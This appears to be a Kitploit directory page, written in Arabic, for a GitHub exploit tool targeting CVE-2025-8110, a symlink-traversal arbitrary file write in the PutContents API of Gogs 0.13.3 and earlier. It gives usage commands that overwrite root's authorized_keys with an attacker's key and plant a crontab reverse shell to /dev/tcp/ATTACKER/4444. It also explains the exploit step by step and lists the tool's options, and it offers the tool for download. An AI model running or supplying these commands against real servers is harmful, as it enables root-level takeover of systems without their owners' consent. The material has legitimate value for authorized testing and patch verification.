Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8110 — CVE-2025-8110 — Gogs <= 0.13.3 كتابة ملف تعسفي عبر اجتياز الرابط الرمزي في واجهة برمجة التطبيقات PutContents | Kitploit
أدوات/GitHubGitHub/3jee/cve-2025-8110
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHub3jee/cve-2025-8110

CVE-2025-8110

CVE-2025-8110 — Gogs <= 0.13.3 كتابة ملف تعسفي عبر اجتياز الرابط الرمزي في واجهة برمجة التطبيقات PutContents

عرض المستودع
24منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8110 — Gogs <= 0.13.3 كتابة ملف تعسفي عبر اجتياز الارتباط الرمزي

نظرة عامة

Gogs <= 0.13.3 معرض لثغرة كتابة ملف تعسفي عبر واجهة برمجة التطبيقات PutContents (/api/v1/repos/:owner/:repo/contents/:path).

تتحقق واجهة برمجة التطبيقات من مسارات الملفات بحثًا عن تسلسلات اجتياز الدليل (../) ولكنها لا تحل الارتباطات الرمزية قبل الكتابة. يمكن للمستخدم الموثّق دفع commit يحتوي على ارتباط رمزي يشير إلى أي ملف على الخادم، ثم استدعاء PutContents على ذلك الارتباط الرمزي لاستبدال الملف الهدف بمحتوى يتحكم فيه المهاجم.

عند تشغيل Gogs كمستخدم root (الإعداد الافتراضي في Docker والعديد من التوزيعات)، يؤدي ذلك إلى اختراق كامل للنظام.

التفاصيلالقيمة
CVECVE-2025-8110
المتأثرGogs <= 0.13.3
النوعكتابة ملف تعسفي موثّق → تنفيذ تعليمات برمجية عن بُعد (RCE)
CVSS8.8 (عالية)
المكوّنواجهة برمجة التطبيقات PutContents

المتطلبات

  • Python 3.10+
  • requests (pip install requests)
  • واجهة سطر الأوامر git
  • حساب Gogs صالح (أو فتح التسجيل الذاتي على الهدف)

الاستخدام

# تسجيل حساب مؤقت + كتابة مفتاح SSH العام للجذر
python3 CVE-2025-8110.py --url http://target:3001 --register \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# باستخدام بيانات اعتماد موجودة
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub

# شيل عكسي عبر crontab
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /etc/crontab \
    --content '* * * * * root bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'

# تنظيف مستودع الاستغلال بعد الاستخدام
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub --cleanup

كيف يعمل

  1. المصادقة — تسجيل الدخول (أو التسجيل الذاتي) وإنشاء رمز API.
  2. إنشاء مستودع — تهيئة مستودع جديد مع ملف README عبر واجهة الويب.
  3. دفع ارتباط رمزي — استنساخ المستودع محليًا، وإنشاء ارتباط رمزي يشير إلى الملف الهدف (مثل /root/.ssh/authorized_keys)، ثم commit و push.
  4. الكتابة عبر الارتباط الرمزي — استدعاء واجهة برمجة التطبيقات PutContents على اسم ملف الارتباط الرمزي. يقوم Gogs بحل الارتباط الرمزي على القرص وكتابة محتوى المهاجم إلى الملف الحقيقي كمستخدم عملية Gogs (غالبًا root).

الخيارات

--url             عنوان URL الأساسي لـ Gogs (مثل http://target:3001)
-u, --user        اسم مستخدم Gogs
-p, --password    كلمة مرور Gogs
--register        تسجيل حساب مؤقت (بدون كابتشا)
--target-file     المسار المطلق للملف المراد استبداله على الخادم
--content         محتوى نصي للكتابة
--content-file    ملف محلي يُقرأ محتواه للكتابة
--repo            اسم المستودع المراد إنشاؤه (افتراضي: عشوائي)
--link-name       اسم ملف الارتباط الرمزي في المستودع (افتراضي: payload)
--cleanup         حذف مستودع الاستغلال بعد الكتابة

إخلاء مسؤولية

هذه الأداة مُقدمة لأغراض الاختبار الأمني المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها بمسؤولية.

تنزيل الأداة